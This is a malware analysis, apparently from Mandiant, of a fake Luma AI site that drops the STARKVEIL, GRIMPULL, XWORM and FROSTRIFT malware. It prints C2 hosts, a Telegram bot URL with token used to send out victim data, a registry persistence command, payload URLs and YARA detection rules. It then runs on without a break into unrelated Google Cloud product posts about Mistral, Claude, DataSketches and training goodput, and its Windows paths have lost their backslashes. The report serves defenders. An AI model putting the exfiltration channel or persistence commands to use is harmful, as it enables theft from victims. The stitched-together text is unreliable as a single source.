• Anti-VM and Anti-analysis: GRIMPULL checks for commonly used artifactsfeatures from known Sandbox and analysis tools.

• Reconnaissance 

• Host reconnaissance: XWORM and FROSTRIFT survey the host by collecting information, including OS, username, role, hardware identifiers, and installed AV.

• Software reconnaissance: FROSTRIFT checks the existence of certain messaging applications and browsers.

• Tor: GRIMPULL utilizes a Tor Tunnel to fetch additional .NET payloads.

• Telegram: XWORM sends victim notification via telegram including information gathered during host reconnaissance.

• TCP: The malware connects to its C2 using ports 7789, 25699, 56001.

• Keylogger: XWORM log keystrokes from the host.

• Browser extensions: FROSTRIFT scans for 48 browser extensions related to Password managers, Authenticators, and Digital wallets potentially for data theft.

The Lure

This particular case began from a Facebook Ad for “Luma Dream AI Machine”, masquerading as a well-known text-to-video AI tool – Luma AI. The ad, as seen in Figure 4, redirected the user to an attacker-created website hosted at hxxps://lumalabsai[.]in/.

Once on the fake Luma AI website, the user can click the “Start Free Now” button and choose from various video generation functionalities. Regardless of the selected option, the same prompt is displayed, as shown in the GIF in Figure 5. 

This multi-step process, made to resemble any other legitimate text-to-video or image-to-video generation tool website, creates a sense of familiarity to the user and does not give any immediate indication of malicious intent. Once the user hits the generate button, a loading bar appears, mimicking an AI model hard at work. After a few seconds, when the new video is supposedly ready, a Download button is displayed. This leads to the download of a ZIP archive file on the victim host.

Unsurprisingly, the ready-to-download archive is one of many payloads already hosted on the same server, with no connection to the user input. In this case, several archives were hosted at the path hxxps://lumalabsai[.]in/complete/. Mandiant determined that the website will serve the archive file with the most recent “Last Modified” value, indicating continuous updates by the threat actor. Mandiant compared some of these payloads and found them to be functionally similar, with different obfuscation techniques applied, thus resulting in different sizes.

Execution

The previously downloaded ZIP archive contains an executable with a double extension (.mp4 and .exe) in its name, separated by thirteen Braille Pattern Blank (Unicode: U+2800, UTF-8: E2 A0 80) characters. This is a special whitespace character from the Braille Pattern Block in Unicode.

The resulting file name, Lumalabs_1926326251082123689-626.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe, aims to make the binary less suspicious by pushing the .exe extension out of the user view. The number of Braille Pattern Blank characters used varies across different samples served, ranging from 13 to more than 30. To further hide the true purpose of this binary, the default .mp4 Windows icon is used on the malicious file.

Figure 8 shows how the file looks on Windows 11, compared to a legitimate .mp4 file.

STARKVEIL

The binary Lumalabs_1926326251082123689-626.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe, tracked by Mandiant as STARKVEIL, is a dropper written in Rust. Once executed, it extracts an embedded archive containing benign executables and its malware components. These are later utilized to inject malicious code into several legitimate processes. 

Executing the malware displays an error window, as seen in Figure 9, to trick the user into trying to execute it again and into believing that the file is corrupted.

For a successful compromise, the executable needs to run twice; the initial execution results in the extraction of all the embedded files under the C:winsystem directory.

During the second execution, the main executable spawns the Python Launcher, py.exe, with an obfuscated Python command as an argument. The Python command decodes an embedded Python code, which Mandiant tracks as COILHATCH dropper. COILHATCH performs the following actions (note that the script has been deobfuscated and renamed for improved readability):

• The command takes a Base85-encoded string, decodes it, decompresses the result using zlib, deserializes the resulting data using the marshal module, and then executes the final deserialized data as Python code.

• The decompiled first-stage Python code combines RSA, AES, RC4, and XOR techniques to decrypt the second stage Python bytecode.

• The decrypted second-stage Python script executes C:winsystemheifheif.exe, which is a legitimate, digitally signed executable, used to side-load a malicious DLL. This serves as the launcher to execute the other malware components.

The following is the resulting process tree:

explorer.exe 
  ↳ 7zfm.exe "<path>Lumalabs_1926326251082123689-626.zip"
    ↳ "<path>lumalabs_1926326251082123689-626.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe" 
      ↳ "C:winsystempypy.exe" -c exec(__import__ ..<ENCODED PYTHON CODE>..) 
         ↳ "C:WINDOWSsystem32cmd.exe" /c "C:winsystemheifheif.exe"
           ↳ "C:winsystemheifheif.exe"

Malware Analysis

As mentioned, the STARKVEIL malware drops its components during its first execution and executes a launcher on its second execution. The complete analysis of all the malware components and their roles is provided in the next sections.

Each of these DLLs operates as an in-memory dropper and spawns a new victim process to perform code injection through process replacement.

Launcher

The execution of C:winsystemheifheif.exe results in the side-loading of the malicious heif.dll, located in the same directory. This DLL is an in-memory dropper that spawns a legitimate Windows process (which may vary) and performs code injection through process replacement.

The injected code is a .NET executable that acts as a launcher and performs the following:

1. Moves multiple folders from C:winsystem to %APPDATA%. The destination folders are:
   • %APPDATA%python
   • %APPDATA%pythonw
   • %APPDATA%ffplay
   • %APPDATA%Launcher
2. Launches three legitimate processes to side-load associated malicious DLLs. The malicious DLLs for each process are:
   • python.exe: %APPDATA%pythonavcodec-61.dll
   • pythonw.exe: %APPDATA%pythonwheif.dll
   • ffplay.exe: %APPDATA%ffplaylibde265.dll
3. Establishes persistence via AutoRun registry key.
   • value: Dropbox
   • key: SOFTWAREMicrosoftWindowsCurrentVersionRun
   • root: HKCU
   • value data: "cmd.exe /c "cd /d "<exePath>" && "Launcher.exe""

The AutoRun Key executes %APPDATA%LauncherLauncher.exe that sideloads the DLL file libde265.dll. This DLL spawns and injects its payload into AddInProcess32.exe via PE hollowing. The injected code’s main purpose is to execute the legitimate binaries C:winsystemheif2rgbheif2rgb.exe and C:winsystemheif-infoheif-info.exe, which, in turn, sideload the backdoors XWORM and FROSTRIFT, respectively.

GRIMPULL

Of the three executables, the launcher first executes %APPDATA%pythonpython.exe, which side-loads the DLL avcodec-61.dll and injects the malware GRIMPULL into a legitimate Windows process. 

GRIMPULL is a .NET-based downloader that incorporates anti-VM capabilities and utilizes Tor for C2 server connections.

Anti-VM and Anti-Analysis 

GRIMPULL begins by checking for the presence of the mutex value aff391c406ebc4c3, and terminates itself if this is found. Otherwise, the malware proceeds to perform further anti-VM checks, exiting in case any of the mentioned checks succeeds.

Download Function

GRIMPULL verifies the presence of a Tor process. If a Tor process is not detected, it proceeds to download, decompress, and execute Tor from the following URL:

https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/
tor-expert-bundle-windows-i686-13.0.9.tar.gz

Afterwards, Tor will run locally on port 9050.

C2 Communication

GRIMPULL then attempts to connect to the following C2 server via the Tor tunnel over TCP.

strokes[.]zapto[.]org:7789

The malware maintains this connection and periodically checks for .NET payloads. Fetched payloads are decrypted using TripleDES in ECB mode with the MD5 hash of the campaign ID aff391c406ebc4c3 as the decryption key, decompressed with GZip (using a 4-byte length prefix), reversed, and then loaded into memory as .NET assemblies.

Malware Configuration

The configuration elements are encoded as base64 strings, as shown in Figure 16.

Table 5 shows the extracted malware configuration.

XWORM

Secondly, the launcher executes the file %APPDATA%pythonwpythonw.exe, which side-loads the DLL heif.dll and injects XWORM into a legitimate Windows process.

XWORM is a .NET-based backdoor that communicates using a custom binary protocol over TCP. Its core functionality involves expanding its capabilities through a plugin management system. Downloaded plugins are written to disk and executed. Supported capabilities include keylogging, command execution, screen capture, and spreading to USB drives.

XWORM Configuration

The malware begins by decoding its configuration using the AES algorithm.

Table 6 shows the extracted malware configuration.

Host Reconnaissance

The malware then performs a system survey to gather the following information:

• Bot ID

• Username

• OS Name

• If it’s running on USB

• CPU Name

• GPU Name

• Ram Capacity

• AV Products list

Sample of collected information:

☠ [KW-2201]

New Clinet : <client_id_from_machine_info_hash>
UserName : <victim_username>
OSFullName : <victim_OS_name>
USB : <is_sample_name_USB.exe>
CPU : <cpu_description>
GPU : <gpu_description>
RAM : <ram_size_in_GBs>
Groub : <installed_av_solutions>

This information is sent to a Telegram chat:

hxxps[:]//api[.]telegram[.]org:443/bot8060948661:AAFwePyBCBu9X-gOemLYLlv1
owtgo24fcO0/sendMessage?chat_id=-1002475751919&text=<collected_sysinfo>

Keylogging

The malware sample saves the logged keystrokes to the file %temp%Log.tmp.

Sample of content of Log.tmp:

....### explorer ###..[Back]
[Back]
b    
a
n
k
[ENTER]

C2 Communication

The sample connects to its C2 server at tcp://artisanaqua[.]ddnsking[.]com:25699 and initially sends the following information to the C2:

"INFO<Xwormmm>victim_id<Xwormmm>user<Xwormmm>
os_name<Xwormmm>XWorm V5.2<Xwormmm>date_in_dd/mm/yyyy
<Xwormmm>is_sample_name_USB.exe
<Xwormmm>is_administrator<Xwormmm>has_webcam<Xwormmm>cpu_info
<Xwormmm>gpu_info<Xwormmm>ram_size<Xwormmm>installed_AVs"

Then the sample waits for any of the following supported commands:

FROSTRIFT

Lastly, the launcher executes the file %APPDATA%ffplayffplay.exe to side-load the DLL %APPDATA%ffplaylibde265.dll and inject FROSTRIFT into a legitimate Windows process.

FROSTRIFT is a .NET backdoor that collects system information, installed applications, and crypto wallets. Instead of receiving C2 commands, it receives .NET modules that are stored in the registry to be loaded in-memory. It communicates with the C2 server using GZIP-compressed protobuf messages over TCP/SSL.

Malware Configuration

The malware starts by decoding its configuration, which is a Base64-encoded and GZIP-compressed protobuf message embedded within the strings table.

Table 8 shows the extracted malware configuration.

Persistence

FROSTRIFT can achieve persistence by running the command:

powershell.exe "Remove-ItemProperty -Path 'HKCU:SOFTWARE
MicrosoftWindowsCurrentVersionRun' -Name '<sample_file_name>
';New-ItemProperty -Path 'HKCU:SOFTWAREMicrosoftWindows
CurrentVersionRun' -Name '<sample_file_name>' -Value '""%APPDATA%
<sample_file_name>""' -PropertyType 'String'"

The sample copies itself to %APPDATA% and adds a new registry value under HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun with the new file path as data to ensure persistence at each system startup.

Host Reconnaissance

The following information is initially collected and submitted by the malware to the C2:

FROSTRIFT checks for the existence of the following browsers:

Table 10: List of browsers

FROSTRIFT also checks for the existence of 48 browser extensions related to Password managers, Authenticators, and Digital wallets. The full list is provided in Table 11.

C2 Communication 

The malware expects the C2 to respond by sending GZIP-compressed Protobuf messages with the following fields:

• registry_val: A registry value under HKCUSoftware<victim_id> to store the loader_bytes.

• loader_bytes: Assembly module to load the loaded_bytes (stored at registry in reverse order).

• loaded_bytes: GZIP-compressed assembly module to be loaded in-memory.

The sample receives loader_bytes only in the first message as it stores it under the registry value HKCUSoftware<victim_id>registry_val. For the subsequent messages, it only receives registry_val which it uses to fetch loader_bytes from the registry.

The sample sends empty GZIP-compressed Protobuf messages as a keep-alive mechanism until the C2 sends another assembly module to be loaded.

The malware has the ability to download and execute extra payloads from the following hardcoded URLs (this feature is not enabled in this sample):

• WebDriver2.exe: hxxps://github[.]com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll;

• chromedriver2.exe: hxxps://github[.]com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe

• msedgedriver2.exe: hxxps://github[.]com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe

The files are WebDrivers for browsers that can be used for testing, automation, and interacting with the browser. They can also be used by attackers for malicious purposes, such as deploying additional payloads.

Conclusion

As AI has gained tremendous momentum recently, our research highlights some of the ways in which threat actors have taken advantage of it. Although our investigation was limited in scope, we discovered that well-crafted fake “AI websites” pose a significant threat to both organizations and individual users. These AI tools no longer target just graphic designers; anyone can be lured in by a seemingly harmless ad. The temptation to try the latest AI tool can lead to anyone becoming a victim. We advise users to exercise caution when engaging with AI tools and to verify the legitimacy of the website’s domain. 

Acknowledgements

Special thanks to Stephen Eckels, Muhammad Umair, and Mustafa Nasser for their assistance in analyzing the malware samples. Richmond Liclican for his inputs and attribution. Ervin Ocampo, Swapnil Patil, Muhammad Umer Khan, and Muhammad Hasib Latif for providing the detection opportunities.

Detection Opportunities

The following indicators of compromise (IOCs) and YARA rules are also available as a collection and rule pack in Google Threat Intelligence (GTI). 

Host-Based IOCs

Network-Based IOCs

Malware Command and Control

Fake AI Domains

YARA Rules

rule G_Dropper_COILHATCH_1 {
	meta:
		author = "Mandiant"
	strings:
		$i1 = "zlib.decompress" ascii wide
		$i2 = "rc4" ascii wide
		$i3 = "aes_decrypt" ascii wide
		$i4 = "xor" ascii wide
		$i5 = "rsa_decrypt" ascii wide
		$r1 = "private_key" ascii wide
		$r2 = "runner" ascii wide
		$r3 = "marshal" ascii wide
		$r4 = "marshal.loads" ascii wide
		$r5 = "b85decode" ascii wide
		$r6 = "exceute_func" ascii wide
		$r7 = "hybrid_decrypt" ascii wide
	condition:
		(4 of ($i*)) and all of ($r*)
}

rule G_Dropper_STARKVEIL_1 {
	meta:
		author = "Mandiant"
	strings:
		$p00_0 = { 56 57 53 48 83 EC ?? 48 8D AA [4] 48 8B 7D 
?? 48 8B 4F ?? FF 15 [4] 48 89 F9 }
		$p00_1 = { 0F 0B 66 0F 1F 84 00 [4] 48 89 54 24 ?? 55 41 
56 56 57 53 48 83 EC }
	condition:
		uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 
and (($p00_0 in (48000 .. 59000) and $p00_1 in (100000 .. 120000)))
}

import "dotnet"

rule G_Downloader_GRIMPULL_1 {
	meta:
		author = "Mandiant"
	strings:
		$str1 = "SbieDll.dll" ascii wide
		$str2 = "cuckoomon.dll" ascii wide
		$str3 = "vmGuestLib.dll" ascii wide
		$str4 = "select * from Win32_BIOS" ascii wide
		$str5 = "VMware|VIRTUAL|A M I|Xen" ascii wide
		$str6 = "Microsoft|VMWare|Virtual" ascii wide
		$str7 = "win32_process.handle='{0}'" ascii wide
		$str8 = "stealer" ascii wide
		$code = { 11 20 11 0F 11 20 11 0F 91 11 1A 11 0F 91 61 D2 9C }
	condition:
		dotnet.is_dotnet and all of them
}

rule G_Backdoor_FROSTRIFT_1 {
	meta:
		author = "Mandiant"
	strings:
		$guid = "$23e83ead-ecb2-418f-9450-813fb7da66b8"
		$r1 = "IdentifiableDecryptor.DecryptorStack"
		$r2 = "$ProtoBuf.Explorers.ExplorerDecryptor"
		$s1 = "\User Data\" wide
		$s2 = "SELECT * FROM AntiVirusProduct" wide
		$s3 = "Telegram.exe" wide
		$s4 = "SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 
'Image' OR PNPClass = 'Camera')" wide
		$s5 = "Litecoin-Qt" wide
		$s6 = "Bitcoin-Qt" wide
	condition:
		uint16(0) == 0x5a4d and (all of ($s*) or $guid or all of ($r*))
}

YARA-L Rules

Mandiant has made the relevant rules available in the Google SecOps Mandiant Intel Emerging Threats curated detections rule set. The activity discussed in the blog post is detected under the rule names:

• Suspicious Binary File Execution – MP4 Masquerade

• Suspicious Binary File Execution – Double Extension and Braille Pattern Blank Masquerade

• Python Script Deobfuscation – Base85 ZLib Marshal

• Suspicious Staging Directory WinSystem

• DLL Search Order Hijacking AVCodec61

• DLL Search Order Hijacking HEIF

• DLL Search Order Hijacking Libde265

At Google Cloud, we’re committed to providing the most open and flexible AI ecosystem for you to build solutions best suited to your needs. Today, we’re excited to announce our expanded AI offerings with Mistral AI on Google Cloud: 

1. Le Chat Enterprise on Google Cloud Marketplace: An AI assistant that offers enterprise search, agent builders, custom data and tool connectors, custom models, document libraries, and more in a unified platform. 

2. Mistral OCR 25.05 on Vertex AI: Mistral’s new Optical Character Recognition API that excels in document understanding. 

Le Chat Enterprise on Google Cloud Marketplace

Available today on Google Cloud Marketplace, Mistral AI’s Le Chat Enterprise is a generative AI work assistant designed to connect tools and data in a unified platform for enhanced productivity. 

Use cases include:

• Building agents: With Le Chat Enterprise, you can customize and deploy a variety of agents that understand and synchronize with your unique context, including no-code agents.
• Accelerating research and analysis: With Le Chat Enterprise, you can quickly summarize lengthy reports, extract key data from documents, and perform rapid web searches to gather information efficiently.
• Generating actionable insights: With Le Chat Enterprise, industries — like finance — can convert complex data into actionable insights, generate text-to-SQL queries for financial analysis, and automate financial report generation.
• Accelerating software development: With Le Chat Enterprise, you can debug and optimize existing code, generate and review code, or create technical documentation.
• Enhancing content creation: With Le Chat Enterprise, you can help marketers generate and refine marketing copy across channels, analyze campaign performance data, and collaborate on visual content creation through Canvas. 

By deploying Le Chat Enterprise through Google Cloud Marketplace, organizations can leverage the scalability and security of Google Cloud’s infrastructure, while also benefiting from a simplified procurement process and integrations with existing Google Cloud services such as BigQuery and Cloud SQL. 

For more information on Le Chat Enterprise, read Mistral AI’s announcement.

Mistral OCR 25.05 on Vertex AI Model Garden

Mistral OCR 25.05 excels in document understanding and can comprehend elements of content-rich papers—like media, text, charts, tables, graphs, and equations—with powerful accuracy and cognition. More example use cases include: 

• Digitizing scientific research: Research institutions can use Mistral OCR 25.05 to accelerate scientific workflows by converting scientific papers and journals into AI-ready formats, making them accessible to downstream intelligence engines. 
• Preserving historical and cultural heritage: Digitizing historical documents and artifacts to assist with preservation and making them more accessible to a broader audience.
• Streamlining customer service: Customer service departments can reduce response times and improve customer satisfaction by using Mistral OCR 25.05 to transform documentation and manuals into indexed knowledge.
• Making literature across design, education, legal, etc. AI ready: Mistral OCR 25.05 can discover insights and accelerate productivity across a large volume of documents by helping companies convert technical literature, engineering drawings, lecture notes, presentations, regulatory filings and more into indexed, answer-ready formats.

When building with Mistral OCR 25.05 as a Model-as-a-Service (MaaS) on Vertex AI, you get a comprehensive AI platform to scale with fully managed infrastructure and build confidently with enterprise-grade security and compliance. Mistral OCR 25.05 joins a curated selection of over 200 foundation models in Vertex AI Model Garden, empowering you to choose the ideal solution for your specific needs.

Get started

To get started with Mistral’s Le Chat Enterprise, visit the Le Chat Enterprise Google Cloud Marketplace listing and reach out to the Mistral AI sales team.

To start building with Mistral OCR 25.05 on Vertex AI, visit the Mistral OCR 25.05 model card in Vertex AI Model Garden, select “Enable”, and follow the proceeding instructions.

Today, we’re expanding the choice of third-party models available in Vertex AI Model Garden with the addition of Anthropic’s newest generation of the Claude model family: Claude Opus 4 and Claude Sonnet 4. Both Claude Opus 4 and Claude Sonnet 4 are hybrid reasoning models, meaning they offer modes for near-instant responses and extended thinking for deeper reasoning.  

Claude Opus 4 is Anthropic’s most powerful model to date. Claude Opus 4 excels at coding, with sustained performance on complex, long-running tasks and agent workflows. Use cases include advanced coding work, autonomous AI agents, agentic search and research, tasks that require complex problem solving, and long-running tasks that require precise content management. 

Claude Sonnet 4 is Anthropic’s mid-size model that balances performance with cost. It surpasses its predecessor, Claude Sonnet 3.7, across coding and reasoning while responding more precisely to steering. Use cases include coding tasks such as code reviews and bug fixes, AI assistants, efficient research, and large-scale content generation and analysis.

Claude Opus 4 and Claude Sonnet 4 are generally available as a Model-as-a-Service (MaaS) offering on Vertex AI. For more information on the newest Claude models, visit Anthropic’s blog.

Build advanced agents on Vertex AI

Vertex AI is Google Cloud’s comprehensive platform for orchestrating your production AI workflows across three pillars: data, models, and agents—a combination that would otherwise require multiple fragmented solutions. A key component of the model pillar is Vertex AI Model Garden, which offers a curated selection of over 200 foundation models, including Google’s models, third-party models, and open models—empowering you to choose the ideal solution for your specific needs.

You can leverage Vertex AI’s Model-as-a-Service (MaaS) to rapidly deploy and scale Claude-powered intelligent agents and applications, benefiting from integrated agentic tooling, fully managed infrastructure, and enterprise-grade security.

By building on Vertex AI, you can: 

• Orchestrate sophisticated multi-agent systems: Build agents with an open approach using Google’s Agent Development Kit (ADK) or your preferred framework. Deploy your agents to production with enterprise-grade controls directly in Agent Engine. 
• Harness the power of Google Cloud integrations: You can connect Claude directly within BigQuery ML to facilitate functions like text generation, summarization, translation, and more.
• Optimize performance with provisioned throughput: Reserve dedicated capacity and prioritized processing for critical production workloads with Claude models at a fixed fee. To get started with provisioned throughput, contact your Google Cloud sales representative.
• Maximize Claude model utilization: Reduce latency and costs while increasing throughput by employing Vertex AI’s advanced features for Claude models such as batch predictions, prompt caching, token counting, and citations. For detailed information, refer to our documentation.
• Scale with fully managed infrastructure: Vertex AI’s fully managed and AI-optimized infrastructure simplifies how you deploy your AI workloads in production. Additionally, Vertex AI’s new global endpoints for Claude (public preview) enhance availability by dynamically serving traffic from the nearest available region.
• Build confidently with enterprise-grade security and compliance: Benefit from Vertex AI’s built-in security and compliance measures that satisfy stringent enterprise requirements.

Customers achieving real impact with Claude on Vertex AI

To date, more than 4,000 customers have started using Anthropic’s Claude models on Vertex AI. Here’s a look at how top organizations are driving impactful results with this powerful integration:

Augment Code is running its AI coding assistant, which specializes in helping developers navigate and contribute to production-grade codebases, with Anthropic’s Claude models on Vertex AI.

“What we’re able to get out of Anthropic is truly extraordinary, but all of the work we’ve done to deliver knowledge of customer code, used in conjunction with Anthropic and the other models we host on Google Cloud, is what makes our product so powerful.” – Scott Dietzen, CEO, Augment Code 

Palo Alto Networks is accelerating software development and security by deploying Claude on Vertex AI.

“With Claude running on Vertex AI, we saw a 20% to 30% increase in code development velocity. Running Claude on Google Cloud’s Vertex AI not only accelerates development projects, it enables us to hardwire security into code before it ships.” – Gunjan Patel, Director of Engineering, Office of the CPO, Palo Alto Networks

Replit leverages Claude on Vertex AI to power Replit Agent, which empowers people across the world to use natural language prompts to turn their ideas into applications, regardless of coding experience.

“Our AI agent is made more powerful through Anthropic’s Claude models running on Vertex AI. This integration allows us to easily connect with other Google Cloud services, like Cloud Run, to work together behind the scenes to help customers turn their ideas into apps.” – Amjad Masad, Founder and CEO, Replit

Get started 

To get started with the new Claude models on Vertex AI, navigate to the Claude Opus 4 or the Claude Sonnet 4 model card in Vertex AI Model Garden, select “Enable”, and follow the proceeding instructions. 

You can also find and easily procure Claude Opus 4 and Claude Sonnet 4 on Google Cloud Marketplace.

Explore our sample notebook and documentation to start building.

In today’s data-driven world, understanding large datasets often requires numerous, complex non-additive¹ aggregation operations. But as the size of the data becomes massive², these types of operations become computationally expensive and time-consuming using traditional methods. That’s where Apache DataSketches come in. We’re excited to announce the availability of Apache DataSketches functions within BigQuery, providing powerful tools for approximate analytics at scale.

Apache DataSketches is an open-source library of sketches, specialized streaming algorithms that efficiently summarize large datasets. Sketches are small probabilistic data structures that enable accurate estimates of distinct counts, quantiles, histograms, and other statistical measures – all with minimal memory, minimal computational overhead, and with a single pass through the data. All but a few of these sketches provide mathematically proven error bounds, i.e., the maximum possible difference between a true value and its estimated or approximated value. These error bounds can be adjusted by the user as a trade-off between the size of the sketch and the size of the error bounds. The larger the configured sketch, the smaller will be the size of the error bounds. 

With sketches, you can quickly gain insights from massive datasets, especially when exact computations are impractical or impossible. The sketches themselves can be merged, making them additive and highly parallelizable, so you can combine sketches from multiple datasets for further analysis. This combination of small size and mergeability can translate into orders-of-magnitude improvement in speed of computational workload compared to traditional methods.

Why DataSketches in BigQuery?

BigQuery is known for its ability to process petabytes of data, and DataSketches are a natural fit for this environment. With DataSketches functions, BigQuery lets you:

• Perform rapid approximate queries: Get near-instantaneous results for distinct counts, quantile analysis, adaptive histograms and other non-additive aggregate calculations on massive datasets.

• Save on resources: Reduce query costs and storage requirements by working with compact sketches instead of raw data.

• Move between systems: DataSketches have well-defined stored binary representations that let sketches be transported between systems and interpreted by three major languages: Java, C++, and Python, all without losing any accuracy.

Apache DataSketches come to BigQuery through custom C++ implementations using the Apache DataSketches C++ core library compiled to WebAssembly (WASM) libraries, and then loaded within BigQuery Javascript user-defined aggregate functions (JS UDAFs). 

How BigQuery customers use Apache DataSketches

Yahoo started the Apache DataSketches project in 2011, open-sourced it in 2015, and still uses the Apache DataSketches library. They use approximate results in various analytic query operations such as count distinct, quantiles, and most frequent items (a.k.a. Heavy Hitters). More recently, Yahoo adapted the DataSketches library to leverage the large scale of BigQuery, using the Google-defined JavaScript User Defined Aggregate Functions (UDAF) interface to the Google Cloud and BigQuery platform.

“Yahoo has successfully used the Apache DataSketches library to analyze massive data in our internal production processing systems for more than 10 years. Data sketching has allowed us to respond to a wide range of queries summarizing data in seconds, at a fraction of the time and cost of brute-force computation. As an early innovator in developing this powerful technology, we are excited about this fast, accurate, large-scale, open-source technology becoming available to those already working in a Google Cloud BigQuery environment.” – Matthew Sajban, Director of Software Development Engineering, Yahoo

Featured sketches

So, what can you do with Apache DataSketches? Let’s take a look at the sketches integrated with BigQuery.

Cardinality sketches

• Hyper Log Log Sketch (HLL): The DataSketches library implements this historically famous sketch algorithm with lots of versatility. It is best suited for straightforward distinct counting (or cardinality) estimation. It can be adapted to a range of sizes from roughly 50 bytes to about 2MB depending on the accuracy requirements. It also comes in three flavors: HLL_4, HLL_6, HLL_8 that enable additional tuning of speed and size.

• Theta Sketch: This sketch specializes in set expressions and allows not only normal additive unions but also full set expressions between sketches with set-intersection and set-difference. Because of its algebraic capability, this sketch is one of the most popular sketches. It has a range of sizes from a few hundred bytes to many megabytes, depending on the accuracy requirements.

• CPC Sketch: This cardinality sketch takes advantage of recent algorithmic research and enables smaller stored size, for the same accuracy, than the classic HLL sketch. It is targeted for situations where accuracy per stored size is the most critical metric.

• Tuple Sketch: This extends Theta Sketch to enable the association of other values with each unique item retained by the sketch. This allows the computation of summaries of attributes like impressions or clicks as well as more complex analysis of customer engagement, etc.

Quantile sketches

• KLL Sketch: This Sketch is designed for quantile estimation (e.g., median, percentiles), and ideal for understanding distributions, creating density and histogram plots, and partitioning large data sets. The KLL algorithm used in this sketch has been proven to have statistically optimal quantile approximation accuracy for a given size. The KLL Sketch can be used with any kind of data that is comparable, i.e., has a defined sorting order between items. The accuracy of KLL is insensitive to the input data distribution.

• REQ Sketch: This quantile sketch is designed for situations where accuracy at the ends of the rank domain is more important than at the median. In other words, if you’re most interested in accuracy at the 99.99th percentile and not so interested in the accuracy at the 50th percentile, this is the sketch to choose. Like the KLL Sketch, this sketch has mathematically proven error bounds. The REQ sketch can be used with any kind of data that is comparable, i.e., has a defined sorting order between items. By design, the accuracy of REQ is sensitive to how close an item is to the ends of the normalized rank domain (i.e., close to rank 0.0 or rank 1.0), otherwise it is insensitive to the input distribution.

• T-Digest Sketch: This is also a quantile sketch, but it’s based on a heuristic algorithm and doesn’t have mathematically proven error properties. It is also limited to strictly numeric data. The accuracy of the T-Digest Sketch can be sensitive to the input data distribution. However, it’s a very good heuristic sketch, fast, has a small footprint, and can provide excellent results in most situations.

Frequency sketches

• Frequent Items Sketch: This sketch is also known as a Heavy-Hitter sketch. Given a stream of items, this sketch identifies, in a single pass, the items that occur more frequently than a noise threshold, which is user-configured by the size of the sketch. This is especially useful in real-time situations. For example, what are the most popular items from a web site that are being actively queried, over the past hour, day, or minute? Its output is effectively an ordered list of the most frequently visited items. This list changes dynamically, which means you can query the sketch, say, every hour to help you understand the query dynamics over the course of a day. In static situations, for example, it can be used to discover the largest files in your database in a single pass and with only a modest amount of memory.

How to get started

To leverage the power of DataSketches in BigQuery, you can find the new functions within the bqutil.datasketches dataset (for US multi-region location) or bqutil.datasketches_<bq_region> dataset (for any other regions and locations). For detailed information on available functions and their usage, refer to the DataSketches README. You can also find demo notebooks in our GitHub repo for the KLL Sketch, Theta Sketch, and FI Sketch. 

Example: Obtaining estimates of Min, Max, Median, 75th, 95th percentiles and total count using the KLL Quantile Sketch

Suppose you have 1 million comparable³ records in 100 different partitions or groups. You would like to understand how the records are distributed by their percentile or rank, without having to bring them all together in memory or even sort them.   

SQL:

This code produces the result:

Example: Estimating user engagement metrics

The DataSketches Tuple Sketch is a powerful tool to analyze properties that have a natural association with unique identifiers.

For example, imagine you have a large-scale web application that records user identifiers and their clicks on various elements. You would like to analyze this massive dataset efficiently to obtain approximate metrics for clicks per unique user. The Tuple Sketch computes the number of unique users and allows you to track additional properties that are naturally associated with the unique identifiers as well.

SQL:

This produces the following result:

Get faster, more accurate estimations

In short, DataSketches in BigQuery unlocks a new dimension of approximate analytics, helping you gain valuable insights from massive datasets quickly and efficiently. Whether you’re tracking website traffic, analyzing user behavior, or performing any other large-scale data analysis, DataSketches are your go-to tools for fast, accurate estimations.

To start using DataSketches in BigQuery, refer to the DataSketches-BigQuery repository README for building, installing and testing the DataSketches-BigQuery library in your own environment. In each sketch folder there is a README that details the specific function specifications available for that sketch.

If you are working in a BigQuery environment, the DataSketches-BigQuery library is already available for you to use in all regional public BigQuery datasets.

<sup>1. Examples include distinct counting, quantiles, topN, K-means, density estimation, graph analysis, etc.
The results from one parallel partition cannot be simply “added” to the results of another partition – thus the term non-additive (a.k.a. non-linear operations).
2. Massive ~ typically, much larger than what can be conveniently kept in random-access memory.
3. Any two items can be compared to establish their order, i.e. if A < B, then A precedes B.</sup>

Want to save some money on large AI training? For a typical PyTorch LLM training workload that spans thousands of accelerators for several weeks, a 1% improvement in ML Goodput can translate to more than a million dollars in cost savings¹. Therefore, improving ML Goodput is an important goal for model training — both from an efficiency perspective, as well as for model iteration velocity. 

However, there are several challenges to improving ML Goodput today: frequent interruptions that necessitate restarts from the latest checkpoint, slow inline checkpointing that interrupts training, and limited observability that makes it difficult to detect failures. These issues contribute to a significant increase in the time-to-market (TTM) and cost-to-train. There have been several industry publications articulating these issues, e.g., this Arxiv paper. 

Improving ML Goodput

In order to improve ML Goodput, you need to minimize the impact of disruptive events on the progress of the training workload. To resume a job quickly, you can automatically scale down the job, or swap failed resources from spare capacity. At Google Cloud, we call this elastic training. Further, you can reduce workload interruptions during checkpointing and speed up checkpoint loads on failures from the nearest available storage location. We call these capabilities asynchronous checkpointing and multi-tier checkpointing. 

The following picture illustrates how these techniques provide an end-to-end remediation workflow to improve ML Goodput for training. An example workload of nine nodes is depicted with three-way data parallelism (DP) and three-way pipeline parallelism (PP), with various remediation actions shown based on the failures and spare capacity.

You can customize the remediation policy for your specific workload. For example, you can choose between a hotswap and a scaling-down remediation strategy, or to configure checkpointing frequency, etc. A supervisor process receives failure, degradation, and straggler signals from a diagnostic service.  The supervisor uses the policy to manage these events. In case of correctable errors, the supervisor might request an in-job restart, potentially restoring from a local checkpoint. For uncorrectable hardware failures, a hot swap can replace the faulty node, potentially restoring from a peer checkpoint. If no spare resources are available, the system can scale down. These mechanisms ensure training is more resilient and adaptable to resource changes. When a replacement node is available, training scales up automatically to maximize GPU utilization. During scale down and scale up, user-defined callbacks help adjust hyperparameters such as learning rate and batch size. You can set remediation policies using a Python script.

Let’s take a deeper look at the key techniques you can use when optimizing ML Goodput.

Elastic training

